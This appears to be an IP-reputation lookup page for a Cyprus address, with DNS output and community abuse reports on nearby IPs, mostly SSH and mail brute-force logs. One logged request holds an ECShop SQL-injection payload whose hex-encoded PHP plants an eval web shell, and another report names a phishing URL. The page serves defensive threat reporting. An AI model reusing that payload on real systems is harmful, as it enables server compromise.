195.216.243.40

Basic Info

City: unknown

Region: unknown

Country: Cyprus

Internet Service Provider: unknown

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:

Make a comment on this IP

No discussion about this IP yet. Click above link to make one.

Comments on same subnet:

IP	Type	Details	Datetime
195.216.243.155	attack	IP of malicious site related to attempted identity theft. Malicious site: https://u.to/ImvIF*	2019-11-25 04:21:57

Whois info:

Dig info:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 195.216.243.40
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 11854
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;195.216.243.40.			IN	A

;; AUTHORITY SECTION:
.			498	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2022021800 1800 900 604800 86400

;; Query time: 57 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Fri Feb 18 22:31:18 CST 2022
;; MSG SIZE  rcvd: 107

Host info

40.243.216.195.in-addr.arpa domain name pointer s40.ucoz.net.

Nslookup info:

Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
40.243.216.195.in-addr.arpa	name = s40.ucoz.net.

Authoritative answers can be found from:

Related IP info:

Related comments:

IP	Type	Details	Datetime
37.115.190.172	attack	37.115.190.172 - - \[15/Sep/2019:09:00:21 +0200\] "GET /post/2014/06/19/Rod-Rees-Demi-Monde/ HTTP/1.1" 404 9291 "https://poesia-portuguesa.com/" "Mozilla/4.0 $compatible\; MSIE 6.0\; Windows NT 5.1\; SV1\; FunWebProducts\; .NET CLR 1.1.4322\; PeoplePal 6.2$" 37.115.190.172 - - \[15/Sep/2019:09:00:22 +0200\] "GET /post/2014/06/19/Rod-Rees-Demi-Monde/ HTTP/1.1" 404 9291 "https://poesia-portuguesa.com/" "Mozilla/4.0 $compatible\; MSIE 6.0\; Windows NT 5.1\; SV1\; FunWebProducts\; .NET CLR 1.1.4322\; PeoplePal 6.2$"	2019-09-15 21:20:45
142.93.242.95	attackspam	Sep 15 15:19:40 MK-Soft-Root1 sshd\[6537\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.242.95 user=root Sep 15 15:19:43 MK-Soft-Root1 sshd\[6537\]: Failed password for root from 142.93.242.95 port 47410 ssh2 Sep 15 15:23:59 MK-Soft-Root1 sshd\[7272\]: Invalid user armaserver from 142.93.242.95 port 35572 Sep 15 15:23:59 MK-Soft-Root1 sshd\[7272\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.242.95 ...	2019-09-15 21:25:52
111.7.100.24	attackspam	Automatic report - Banned IP Access	2019-09-15 20:38:10
51.15.57.248	attack	Sep 15 16:08:48 localhost sshd[18919]: Invalid user gogs from 51.15.57.248 port 52734 Sep 15 16:08:48 localhost sshd[18919]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=51.15.57.248 Sep 15 16:08:48 localhost sshd[18919]: Invalid user gogs from 51.15.57.248 port 52734 Sep 15 16:08:50 localhost sshd[18919]: Failed password for invalid user gogs from 51.15.57.248 port 52734 ssh2 ...	2019-09-15 20:39:43
46.105.110.79	attackbots	Invalid user usuario from 46.105.110.79 port 36862	2019-09-15 21:17:12
94.177.250.221	attackspambots	Sep 15 04:22:11 dallas01 sshd[22524]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=94.177.250.221 Sep 15 04:22:14 dallas01 sshd[22524]: Failed password for invalid user icinga from 94.177.250.221 port 52468 ssh2 Sep 15 04:26:01 dallas01 sshd[22925]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=94.177.250.221	2019-09-15 21:11:14
222.186.42.117	attack	Sep 15 15:24:35 dev0-dcfr-rnet sshd[310]: Failed password for root from 222.186.42.117 port 59516 ssh2 Sep 15 15:28:11 dev0-dcfr-rnet sshd[322]: Failed password for root from 222.186.42.117 port 33138 ssh2	2019-09-15 21:29:38
80.82.65.60	attackbotsspam	Sep 15 14:20:34 relay dovecot: pop3-login: Aborted login $auth failed, 1 attempts in 2 secs$: user=\, method=PLAIN, rip=80.82.65.60, lip=176.9.177.164, session=\ Sep 15 14:20:45 relay dovecot: pop3-login: Aborted login $auth failed, 1 attempts in 6 secs$: user=\, method=PLAIN, rip=80.82.65.60, lip=176.9.177.164, session=\ Sep 15 14:21:01 relay dovecot: pop3-login: Aborted login $auth failed, 1 attempts in 10 secs$: user=\, method=PLAIN, rip=80.82.65.60, lip=176.9.177.164, session=\ Sep 15 14:23:03 relay dovecot: pop3-login: Aborted login $auth failed, 1 attempts in 2 secs$: user=\, method=PLAIN, rip=80.82.65.60, lip=176.9.177.164, session=\ Sep 15 14:25:26 relay dovecot: pop3-login: Aborted login $auth failed, 1 attempts in 2 secs$: user=\, method= ...	2019-09-15 20:39:18
114.40.155.50	attackspam	TW - 1H : (181) Protection Against DDoS WordPress plugin : "odzyskiwanie danych help-dysk" IP Address Ranges by Country : TW NAME ASN : ASN3462 IP : 114.40.155.50 CIDR : 114.40.0.0/16 PREFIX COUNT : 390 UNIQUE IP COUNT : 12267520 WYKRYTE ATAKI Z ASN3462 : 1H - 10 3H - 25 6H - 44 12H - 81 24H - 164 INFO : SYN Flood DDoS Attack Denial-of-Service Attack (DoS) Detected and Blocked by ADMIN - data recovery https://help-dysk.pl	2019-09-15 21:06:33
176.9.24.90	attackspambots	Lines containing failures of 176.9.24.90 Sep 15 08:19:18 shared04 sshd[29706]: Invalid user testuser from 176.9.24.90 port 32772 Sep 15 08:19:18 shared04 sshd[29706]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=176.9.24.90 Sep 15 08:19:20 shared04 sshd[29706]: Failed password for invalid user testuser from 176.9.24.90 port 32772 ssh2 Sep 15 08:19:20 shared04 sshd[29706]: Received disconnect from 176.9.24.90 port 32772:11: Bye Bye [preauth] Sep 15 08:19:20 shared04 sshd[29706]: Disconnected from invalid user testuser 176.9.24.90 port 32772 [preauth] ........ ----------------------------------------------- https://www.blocklist.de/en/view.html?ip=176.9.24.90	2019-09-15 21:00:47
23.247.81.45	attack	23.247.81.45 - - [15/Sep/2019:00:07:45 -0400] "GET /user.php?act=login HTTP/1.1" 302 226 "554fcae493e564ee0dc75bdf2ebf94caads\|a:2:{s:3:"num";s:288:"/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A325A6B5A334575634768774A79776E50443977614841675A585A686243676B583142505531526262475678645630704F79412F506963702729293B2F2F7D787878,10-- -";s:2:"id";s:3:"'/";}" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)" ...	2019-09-15 20:50:16
45.141.84.14	attack	RDP Bruteforce	2019-09-15 20:49:00
69.245.220.97	attackbotsspam	Lines containing failures of 69.245.220.97 (max 1000) Sep 15 08:52:20 Server sshd[829]: Invalid user ibm from 69.245.220.97 port 53954 Sep 15 08:52:20 Server sshd[829]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=69.245.220.97 Sep 15 08:52:23 Server sshd[829]: Failed password for invalid user ibm from 69.245.220.97 port 53954 ssh2 Sep 15 08:52:23 Server sshd[829]: Received disconnect from 69.245.220.97 port 53954:11: Bye Bye [preauth] Sep 15 08:52:23 Server sshd[829]: Disconnected from invalid user ibm 69.245.220.97 port 53954 [preauth] ........ ----------------------------------------------- https://www.blocklist.de/en/view.html?ip=69.245.220.97	2019-09-15 20:45:35
177.69.237.49	attackbots	$f2bV_matches	2019-09-15 21:00:24
109.196.82.214	attackbotsspam	email spam	2019-09-15 20:44:13

Recently Reported IPs

195.216.243.46	195.216.243.39	195.216.98.15	195.218.200.165
195.219.235.225	195.218.200.21	195.218.200.12	195.219.11.17
195.22.104.20	195.22.101.80	195.220.107.3	195.22.112.15
195.218.147.118	195.220.128.193	195.22.25.124	195.22.14.232
195.220.30.60	195.220.135.29	195.22.8.9	195.220.198.155